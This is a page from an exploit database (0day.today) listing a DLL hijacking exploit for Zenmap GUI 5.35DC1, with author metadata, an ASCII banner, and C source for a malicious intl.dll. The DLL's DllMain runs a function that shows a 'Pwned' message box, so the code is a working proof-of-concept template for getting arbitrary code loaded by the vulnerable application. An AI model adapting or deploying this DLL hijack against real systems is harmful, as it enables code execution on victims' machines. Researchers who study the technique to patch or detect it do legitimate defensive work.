[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zenmap 5.35DC1 DLL Hijacking Exploit

Author
PoisonCode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14906
Category
local exploits
Date add
20-11-2010
Platform
windows
====================================
Zenmap 5.35DC1 DLL Hijacking Exploit
====================================

# Title: Zenmap GUI 5.35DC1  DLL Hijacking Exploit(intl.dll)
# Software:http://nmap.org/dist/nmap-5.35DC1-setup.exe
# Version: 5.35DC1
# Tested on: Windows
# Author: PoisonCode
# Email:  PanamaSecurity@hotmail.com
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
#define DllExport __declspec (dllexport)
int PS()
{
  MessageBox(0, "Pwned by PoisonCode-PanamaSecurity", "PSecurity", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{
	PS();}



#  0day.today [2024-11-15]  #